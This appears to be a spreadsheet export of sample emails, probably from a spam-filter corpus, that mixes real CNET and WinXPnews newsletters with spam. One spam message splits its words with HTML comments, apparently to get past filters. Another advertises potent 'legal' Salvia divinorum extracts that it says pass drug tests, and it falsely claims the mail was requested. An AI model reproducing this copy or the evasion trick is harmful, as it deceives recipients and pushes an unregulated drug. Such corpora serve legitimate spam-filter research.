 To remo&lt;!--zzzz--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
 just &lt;a href="http://202.101.163.34:81/ultimatehgh_zeng/remove.php?userid=zzzz@neilgarner.com"&gt; 
 Click Here&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Canning spam without eating up real mail
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Canning spam without eating up real mail&lt;/title&gt;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href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5mj6JtNpAEVgnfqGsJPR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1DvrAPV3Gl22vbAOyenR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXo3AKRDfVqS8CMB0qvseR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSu9paxna9-0t3VVat9yR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4ELuxBxbX3VynhNBuCqlR"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12, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Canning spam without eating up real mail&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech companies chase homeland security&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Lukewarm response to Juniper moves&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 USA Today investigating hack attack&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Web services made easier?&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Wireless lands at European airports&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHolepwScBBBkqU8niQ74R" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Canning spam without eating up real mail&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Like a growing number of Web surfers, Audrie Krause faces a new uncertainty when she hits the send button on her e-mail these days: Will the message get through?
 As the head of a political action group, Krause uses members-only e-mail lists to help educate and organize fellow activists. So she was jarred recently when one message bounced back with a note accusing her of spreading unsolicited junk e-mail, or spam.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1GMBNEAY0VXXjhrHNHyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Tech companies chase homeland security&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Software companies looking for greener pastures are turning to the red, white and blue.
 Whether out of heartfelt patriotism in the wake of Sept. 11 or the desire to tap into the nearly $38 billion budgeted for homeland security spending in 2003, many information technology companies that previously paid little attention to government contracts are now going to great lengths to attract government business.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:20 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxgXlHD2Jlh9GpMUHM3FR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Lukewarm response to Juniper moves&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Juniper Networks continues to muddle through the telecom morass.
 Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings on Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 12:00 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIARQeGIxsPj9y-DzbW-9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;USA Today investigating hack attack&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 National newspaper USA Today said Friday that one or more online vandals had posted a fake front page and six phony news stories on its Web site.
 Network administrators have yet to determine how the vandals compromised the company's Web server Thursday night. The national newspaper has called in local law enforcement to help find out who defaced the site with fake stories.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIwRJDohkbDr4q1O7VpJcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Web services made easier?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Web's leading standards group has updated its core draft specification for Web services.
 The World Wide Web Consortium (W3C) this week published Web Services Description Language (WSDL) 1.2, a language based on XML (Extensible Markup Language) that defines the protocol for interactive services on the Web, as well as their data and location.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:40 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_Idqh3s6lgVb8HYULuonXiR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Wireless lands at European airports&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Network giant Cisco Systems is installing Aironet wireless LANs into lounges at 19 airports across Europe, targeting business travelers with wireless cards in their laptops or personal digital assistants.
 The announcement includes various deals with different telecommunications companies and airports, made under the banner of Cisco Mobile Office, a campaign for wireless LANs (local area networks). The airport deals are at different stages, from a fully fledged paid-for service run by wireless provider Mobynet at Turkey's Ataturk Airport in Istanbul, where the wireless LAN was included when the airport was designed in 1999, to others that are still free trials.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:15 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTa_wxQDgsIC1b2OB8OEPR"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&lt;b&gt;Too many rotten apples&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Will Bush's reforms be enough to calm the Investor Class?
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002 issue
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWYXXShxhOmI_uIUEknR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Making sense of irrational exuberance&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A University of Chicago economist says investors' manic behavior during stock market bubbles may not be as crazy as it seems.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2Hw8nMhVJaylIO7r3fxeR"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href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjKCv8NI81u0PT_Qv1yR"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href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iOVBUIltvDA4oSMpoLnR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjk51ezDgusUb9HGRJ1bfeR"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href="http://clickthru.online.com/Click?q=24-8DdMIcz6CpSRROVgeUef92iqrwyR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpW3FhwCGLs-y39w-_lR"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href="http://clickthru.online.com/Click?q=4e-0Y95InZASFMHiaLIKlsTn8N_Jj9R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVXryWTg_9-hwkp_WEcR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9m2-X4UmFz_e0CvgpaFR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KXtcMnXPDuYWD0V_Wy4R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qSKHGlAfQffN5r5ls4rR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUw-Vm1xOHlq9S_p8qkEiiR"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src="http://news.cnet.com/i/ne/bb/2002/07/0712_casio.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3TK3943FjAi_TOlRfXPR" &gt;Shoot and groove with Casio's slim camera&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis takes a look at the new Casio digital camera that's the size of a credit card and can record  and play music in the MP3 format.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9pCJKqENBEZdihv9KnR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYw3rQHlrZIGiR6ImOeR"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href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37pj0VfWDjP2qJ13b4yR" &gt;
 Merger means bigger bag of chips&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDu9sa_YoQqYoj1cTQ4lR" &gt;
 European PC sales take another dip&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXK8ojaMxvH3QainXQ4R" &gt;
 Rivals help improve Dell's outlook&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJTLVRPAu7hgvo2AKesR" &gt;
 Stocks mixed as techs offer some gains&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQMtiub4JYndFK-AWlFR" &gt;
 Asian travel portal takes off&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTW4dChi1okYP2r70U69R" &gt;
 N.Y. subpoenas PayPal over gambling&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y2o3uYJSEYIEElDh4B1rR" &gt;
 More government eyes on Qwest&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqNNqVOGPUByjw2PB1s7iR" &gt;
 Broadband: U.K. sees double&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U79NuLB_Z1PHq15ZNEEZPR" &gt;
 Ebbers said to know books cooked&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF71mjDXfcl8jfOfRHHUnR" &gt;
 AOL on the hunt for new CEO&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2aFERHfbQq-Kh1XhaeR" &gt;
 Asia proves sweet spot for Yahoo&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-WalD8uUJ5QddfWmTyR" &gt;
 DoubleClick's new focus leads to profit&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88OkioYdALYSS7ZMgtY8lR" &gt;
 Apple goes overseas with retail store&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh93rRCdqEsB8LE27qd4R" &gt;
 Sony shrinks its Memory Stick&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ld248Uq3_tvVyn4IcgyR" &gt;
 Chips, LCDs give clue to Philips' health&lt;/a&gt;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href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4V1KgjVX4RVXFO5JSFR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=5e-ssodzi029a9pzeiysym5X66NduNIGdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE591vi3T8UEE0WNrUZcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5Kg4UY-rU358atSBbiR"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href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetlPedRuKLvd75wKZzPR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTCrWM7ndAE64qDAwrPGrR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzzb-A6nmMKE-nFr99H2iR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbWO_zgGZP85eXsJh-PR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqrqAO_A0pvVdi5Z7ednR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUXOh8KiqzUbrvLkiDeR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=58-mr3xn9JfOQdh9wbj8bBi9GC-MRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Whatever-Dude.com Needs $300 Quick to Get Their Freed from their ISP
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8264811,1717/
 Date: 2002-09-26T05:19:10+01:00
 (whatever-dude)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Information for you
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY BGCOLOR=3D"#ffffff"&gt;
 &lt;P&gt;
 &lt;&lt;HTML&gt;
 &lt;TABLE WIDTH=3D400 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0&gt;
   &lt;TR&gt;
     &lt;TD ALIGN=3D"LEFT" VALIGN=3D"TOP"&gt;&lt;FONT FACE=3D"Tahoma, Arial, Verdana=
 " SIZE=3D2&gt;&lt;/FONT&gt;
       &lt;H2&gt;
 	&lt;FONT COLOR=3D"#FF0000"&gt;GET HIGH...LEGALLY!&lt;/FONT&gt;
       &lt;/H2&gt;
       &lt;P&gt;
       &lt;B&gt;IT REALLY WORKS!&lt;BR&gt;
       PASSES ALL DRUG TESTS!&lt;BR&gt;
       EXTREMELY POTENT!&lt;/B&gt;
       &lt;P&gt;
       &lt;A HREF=3D"http://www.greenmatrix.net/herb/index.html"&gt;&lt;B&gt;CLICK HERE=
  for more
       info on Salvia Divinorum&lt;/B&gt;&lt;/A&gt;
       &lt;P&gt;
       &lt;B&gt; &lt;A HREF=3D"http://www.greenmatrix.net/herb/5x.html"&gt;CLICK HERE f=
 or SALVIA
       5X EXTRACT!&lt;/A&gt; &lt;BR&gt;
       &lt;FONT COLOR=3D"#FF0000"&gt;&lt;BIG&gt;WARNING...VERY POTENT!&lt;/BIG&gt;&lt;/FONT&gt;&lt;/B&gt;
       &lt;P&gt;
       &lt;B&gt; &lt;A HREF=3D"http://www.greenmatrix.net/herb/13x.html"&gt;CLICK HERE =
 for SALVIA
       13X&lt;/A&gt;. The most POTENT, LEGAL, SMOKABLE herb on the planet! 13 tim=
 es the
       power of Salvia Divinorum!&lt;BR&gt;
       &lt;FONT COLOR=3D"#FF0000"&gt;&lt;BIG&gt;WARNING...EXTREMELY POTENT!&lt;/BIG&gt;&lt;/FONT=
 &gt;&lt;/B&gt;
       &lt;P&gt;
       &lt;P&gt;
       &lt;BR&gt;
       &lt;U&gt;Removal Information:&lt;/U&gt;&lt;BR&gt;
       We are strongly against sending unsolicited emails to those who do n=
 ot wish
       to receive our special mailings. You have opted in to one or more of=
  our
       affiliate sites requesting to be notified of any special offers we m=
 ay run
       from time to time. This is NOT unsolicited email. If you do not wish=
  to receive
       further mailings, please
       &lt;A HREF=3D"http://www.greenmatrix.net/herb/remove.html"&gt;click here t=
 o be removed
       from the list&lt;/A&gt;. Please accept our apologies if you have been sent=
  this
       email in error. We honor all removal requests within 24 hours.&lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WinXPnews: Time To Patch Your Windows Media Player
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
 ***************************** WinXPnews HTML ****************************
      If you can see this text, then you are not using an HTML enabled
      email client or your email client could not interpret this HTML.
                  Please read the following instructions!
   This is a posting from WinXPnews for cncnvc@fsg.com
   To manage your profile, click on the following customized link:
          http://www.winxpnews.com/login.cfm?id=9665862091709486
   You can modify or delete your profile there. You may also forward this
   email to listmanager@winxpnews.com stating that you wish to be removed
   from WinXPnews. Please include this complete text section in your email.
  --- Read this newsletter online by visiting http://www.winxpnews.com ---
  --- Please disregard all the text below as it is HTML formatted text ---
 ***************************** WinXPnews HTML *****************************
 --&gt;
 &lt;title&gt;WinXPnews&amp;#153;&lt;/title&gt;
 &lt;style type="text/css"&gt;
 a:link {color: #b04040; font-weight: bold;}
 a:visited {color: #804040; font-weight: bold;}
 a:active {color: #ff0000; font-weight: bold;}
 a:hover {color: #ff0000; font-weight: bold;} &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"&gt;
 &lt;table width = '100%' border = '0'&gt;
 &lt;tr&gt;
 &lt;td bgcolor = '#0055e7' align='right'&gt;
 &lt;img src='http://www.winxpnews.com/graphics/winxpnews_logo_200.jpg' align='left' border='0'&gt;
 &lt;font face='verdana, sans-serif' size='5' color='#ffffff'&gt;
 &lt;b&gt;WinXPnews&amp;#153; E-Zine&lt;/b&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;font face='verdana, sans-serif' size='1' color='#ffffff'&gt;
 Tue, Jul 9, 2002 (Vol. 2, 27 - Issue 33)
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td align='center'&gt;&lt;font face='verdana, sans-serif' size='2'&gt;&lt;b&gt;
 Feel free to forward this newsletter to other WinXP enthusiasts.&lt;/b&gt;&lt;br&gt;
 &lt;b&gt;Read this newsletter online here:
 &lt;a href="http://www.winxpnews.com/?id=33"&gt;
 http://www.winxpnews.com/?id=33&lt;/a&gt;&lt;br&gt;
 For a quick unsubscribe (gasp!) click here:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com"&gt;
 http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;img src='http://www.winxpnews.com/tr/tr.cfm?mid=9665862091709486&amp;xid=33'
 width='0' height='0' border='0'&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='5'&gt;
 &lt;b&gt;Time To Patch Your Windows Media Player&lt;/b&gt;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&amp;nbsp;&amp;nbsp;This issue of WinXPnews&amp;#153 contains:&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;ol&gt;
 &lt;li&gt;EDITOR'S CORNER
 &lt;code1=cncnvc&gt;
 &lt;ul type='square'&gt;
 &lt;li&gt;How to Publish Your Windows XP FTP Server to the Internet
 &lt;/ul&gt;
 &lt;li&gt;HINTS, TIPS, TRICKS &amp; TWEAKS
 &lt;ul type='square'&gt;
 &lt;li&gt;Allow Dial-up Connections to Synchronize Time with Internet Time Servers
 &lt;/ul&gt;
 &lt;li&gt;HOW TO'S: ALL THE NEW XP FEATURES
 &lt;ul type='square'&gt;
 &lt;li&gt;How to Secure an FTP Server on Windows XP Professional
 &lt;/ul&gt;
 &lt;li&gt;WINXP SECURITY: UPDATES &amp; PATCHES
 &lt;ul type='square'&gt;
 &lt;li&gt;Cumulative Patch for Windows Media Player&lt;li&gt;Cumulative Patches for Excel and Word for Windows
 &lt;/ul&gt;
 &lt;li&gt;UPGRADING &amp; COMPATIBILITY ISSUES
 &lt;ul type='square'&gt;
 &lt;li&gt;A Computer May Hang During a Heavy Load with an Ericsson HIS Modem&lt;li&gt;Knowledge Base Search Center - If it is Not Broke, Do Not Break it!
 &lt;/ul&gt;
 &lt;li&gt;WINXP CONFIGURING &amp; TROUBLESHOOTING
 &lt;ul type='square'&gt;
 &lt;li&gt;A Description of the Repair Option on a Local Area Network or High-Speed Internet Connection&lt;li&gt;Keyboard and Mouse Do Not Work When You Start Windows&lt;li&gt;How to Deploy Windows XP Images from Windows 2000 RIS Servers
 &lt;/ul&gt;
 &lt;li&gt;FAVE LINKS
 &lt;ul type='square'&gt;
 &lt;li&gt;This Week's Links We Like. Tips, Hints And Fun Stuff
 &lt;/ul&gt;
 &lt;li&gt;BOOK OF THE WEEK
 &lt;ul type='square'&gt;
 &lt;li&gt;Windows XP Power Tools
 &lt;/ul&gt;
 &lt;/ol&gt;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&amp;nbsp;&amp;nbsp;SPONSOR: iHateSpam - Eliminate Irritating Junk Email&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
